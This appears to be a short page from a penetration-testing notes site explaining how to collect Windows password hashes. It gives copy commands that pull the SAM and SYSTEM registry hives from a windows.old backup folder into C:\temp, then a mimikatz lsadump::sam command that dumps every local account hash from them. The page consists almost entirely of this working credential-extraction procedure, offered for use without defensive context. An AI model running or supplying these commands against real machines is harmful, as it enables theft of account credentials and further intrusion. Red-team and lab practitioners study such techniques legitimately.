Collecting Hashes Using SAM and SYSTEM Files

This is case-specific. That is when you have SAM and SYSTEM files in the backup folder. Let's say windows.old

First, we have to copy the file to other directories let's say C:\temp.

copy C:\windows.old\Windows\System32\SAM C:\temp
copy C:\windows.old\Windows\System32\SYSTEM C:\temp
ls

Now we can run mimikatz to get all hash values.

.\mimikatz.exe "log" "lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM" "exit"

Last updated 1 year ago

hashtagCollecting Hashes Using SAM and SYSTEM Files